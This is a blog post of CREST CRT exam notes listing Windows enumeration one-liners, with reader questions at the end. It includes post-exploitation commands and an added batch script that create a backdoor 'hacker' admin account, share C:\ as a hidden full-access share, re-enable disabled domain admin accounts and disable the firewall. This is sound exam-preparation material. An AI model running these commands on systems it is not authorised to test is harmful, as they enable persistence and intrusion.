Wednesday, 31 December 2014

CREST CRT Exam Preparation

I'm going to be taking the CREST CRT exam in January and wanted to share my preparation notes with the world to save everyone else the time and effort of digging up this information to pass the exam.

Note: I have not taken the exam yet, I do not know the answers and am in no way affiliated with CREST. Note: I passed the exam. Due to confidentiality reasons I can't provide any hints; I will however leave this post up to assist future participants :)

What have we gotta do?

First things first, the official CREST site and CRT page is here:
http://www.crest-approved.org/information-security-testers/registered-tester/index.html

To quote the official documentation - "The Certification Examination has two components: a multiple choice written question section and a practical assessment which is also examined using multiple choice answers. The practical assessment tests candidates’ hands-on penetration testing methodology and skills against reference networks, hosts and applications."

For the "written question" section I'd recommend Wikipedia or some SANS/CEH material. For the practical side of things see below.

Getting hands-on!

My goal during the practical exam is to be as quick and efficient as possible. I want to minimize time spent analyzing results, configuring tools or writing custom stuff and maximize time spent answering questions! I plan to use a Windows box with a Kali Linux VM. Below is my full list of tools and one-liners:

The "b" flag (netstat -b) makes the command take longer but will output the executable (process name) that owns each of the connections. It needs an elevated prompt.

netsh diag show all

{XP only} Shows information on network services and adapters

net view

Queries NBNS/SMB (NetBIOS name service and SMB browsing) and tries to find all hosts in your current workgroup or domain.

net view /domain

Lists all domains visible to the host.

net view /domain:otherdomain

Queries NBNS/SMB and tries to find all hosts in the 'otherdomain' domain.

net user %USERNAME% /domain

Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are logon times, the last password change, logon scripts, and group membership.

net user /domain

Lists all of the domain users.

net accounts

Prints the password policy for the local system. For domain accounts this is superseded by the domain policy, which can differ, so check the /domain form as well.

net accounts /domain

Prints the password policy for the domain.

net localgroup administrators

Prints the members of the local Administrators group.

net localgroup administrators /domain

Because /domain sends the query to a domain controller, this lists the members of the domain's built-in Administrators group rather than the local one, which is another way of getting the *current* domain admins.

net group "Domain Admins" /domain

Prints the members of the Domain Admins group.

net group "Enterprise Admins" /domain

Prints the members of the Enterprise Admins group.

net group "Domain Controllers" /domain

Prints the list of Domain Controllers for the current domain.

net share

Displays your currently shared SMB entries, and what path(s) they point to.

net session | find "\\"

Lists the SMB sessions other machines currently have open against this host; the find keeps only the lines that name a connecting client (\\host or \\IP).

arp -a

Lists all the systems currently in the machine’s ARP table.

route print

Prints the machine's routing table. This can be good for finding other networks and static routes that have been put in place.

whoami

Views the current user (domain\username).

tasklist /v

Lists running processes verbosely (owner, session, CPU time and window title).

taskkill /F /IM "cmd.exe"

Forcibly kills a process by its image name.

net user hacker hacker /add

Creates a new local (to the victim) user called 'hacker' with the password 'hacker'.

net localgroup administrators hacker /add

Adds the new user 'hacker' to the local Administrators group.

net share nothing$=C:\ /grant:hacker,FULL /unlimited

Shares the C drive (you can specify any drive) out as a hidden Windows share (the trailing $ keeps it out of browse lists) and grants the user 'hacker' full rights to access or modify anything on that drive.

One thing to note is that share permissions and NTFS file permissions are evaluated separately: the effective access is the more restrictive of the two, and since Windows XP/Server 2003 the default share permission is Everyone: Read rather than Full Control. Since we added ourselves as a local admin and granted FULL on the share this isn't a problem, but it is something to keep in mind.
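The three steps above (create the account, add it to Administrators, share the drive) as one batch script, with the check I would run after each step and a "cleanup" mode that reverses them so the box is left as found. This is an added example, not code from the original post; the account name, password and share name are the placeholders the post uses.

```batch
@echo off
REM crt-localadmin.bat : add-user / add-to-admins / share-C: steps from this post,
REM each checked before moving on, plus "cleanup" mode to reverse them.
REM Added example, not from the original post; names below are placeholders.
setlocal
set "U=hacker"
set "P=hacker"
set "SHARE=nothing$"

if /i "%~1"=="cleanup" goto :cleanup

REM net.exe returns a non-zero exit code on failure, so || catches e.g. a
REM non-elevated shell or an account that already exists
net user %U% %P% /add || (echo [-] could not create %U% - are you admin? & exit /b 1)
net localgroup administrators %U% /add || (echo [-] could not add %U% to Administrators & exit /b 1)
net share %SHARE%=C:\ /grant:%U%,FULL /unlimited || (echo [-] could not share C:\ as %SHARE% & exit /b 1)

echo [+] verifying
net user %U% | find "Account active"
net localgroup administrators | find /i "%U%" >nul && echo [+] %U% is a local admin
net share %SHARE%
echo [+] done. Remove everything later with: %~nx0 cleanup
goto :eof

:cleanup
REM reverse order of creation; net share /delete may prompt if files are open
net share %SHARE% /delete
net localgroup administrators %U% /delete
net user %U% /delete
echo [+] cleaned up
```

Run it from an elevated prompt; the verification lines are there because a silent failure at the share step (for example a name already in use) is easy to miss when typing the commands by hand under time pressure.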

net user username /active:yes /domain

Changes an inactive / disabled account to active. This can be useful for re-enabling old domain admin accounts to use, but it still puts up a red flag if those accounts are being watched.

netsh firewall set opmode disable

Disables the local Windows firewall. This syntax is for XP/Server 2003; on Vista and later it is deprecated and the equivalent is netsh advfirewall set allprofiles state off.

wmic useraccount get name,sid

Retrieves the name and SID of every local account from the command line.
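Since the goal is speed in the exam, here is an added batch script (my own, not from the original post) that runs the host and domain recon one-liners listed on this page one after another and appends all output to a single text file, so results are searched rather than re-run. The output file name and the exact command set are my choices; adjust them to taste.

```batch
@echo off
REM crt-enum.bat : run the Windows recon one-liners from this post back to back
REM and keep all output in one text file. Added example, not from the original
REM post; the output file name and the exact command set are my own choices.
setlocal
set "OUT=%COMPUTERNAME%-enum.txt"
echo ===== %DATE% %TIME%  host=%COMPUTERNAME%  user=%USERDOMAIN%\%USERNAME% ===== > "%OUT%"

REM ---- local host ----
call :run whoami
call :run ipconfig /all
call :run netstat -anob
call :run arp -a
call :run route print
call :run tasklist /v
call :run net share
call :run net accounts
call :run net localgroup administrators

REM ---- domain (on a workgroup host these just log an error and move on) ----
call :run net view
call :run net view /domain
call :run net user %USERNAME% /domain
call :run net accounts /domain
call :run net localgroup administrators /domain
call :run net group "Domain Admins" /domain
call :run net group "Enterprise Admins" /domain
call :run net group "Domain Controllers" /domain

REM Commands with a pipe cannot go through :run (cmd would apply the pipe to the
REM "call" itself), so they are written out in full. wmic writes UTF-16 when
REM redirected straight to a file, which garbles a mixed log; piping it through
REM "more" converts it to plain text first.
echo. >> "%OUT%"
echo ===== net session ===== >> "%OUT%"
net session 2>&1 | find "\\" >> "%OUT%"
echo. >> "%OUT%"
echo ===== wmic useraccount get name,sid ===== >> "%OUT%"
wmic useraccount get name,sid 2>&1 | more >> "%OUT%"

echo Done. Output is in "%OUT%".
goto :eof

REM :run <command line> - writes a header, then the command's stdout+stderr, to the log
:run
echo. >> "%OUT%"
echo ===== %* ===== >> "%OUT%"
%* >> "%OUT%" 2>&1
goto :eof
```

Run it from an elevated prompt (netstat -b and some net commands need it); afterwards a single find /i "admin" or findstr over the log answers most of the "who is in which group" questions without touching the host again.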

It's still early days for me; however, I have done lots of training over the years (10+): SCP, Security+, Backtrack 101, CISSP, CEH, ECSA. Now, I know many of the courses I have done are only touching the tip of the iceberg in relation to pen-testing, but as I am out of work I was wondering if it would be reasonable to skip the training and just take the exam?

Like any exam it's wise to revise and prepare accordingly. The amount of prep depends on your experience. For the CRT, if you have a few years' security/pentesting experience you should be fine. Without practical experience, though, you may find it hard.

Does this exam follow a CTF format, where you have to own different boxes? Apart from that, what level of detail is required in the exam? Do you have to know every single thing about IPSec, for instance?

Hi, great post! One more question: do I need to get root on the exam boxes to find all the answers, or is it enough to scan and enumerate the machine to find them? Please advise. I'm looking to book the exam ASAP. Thanks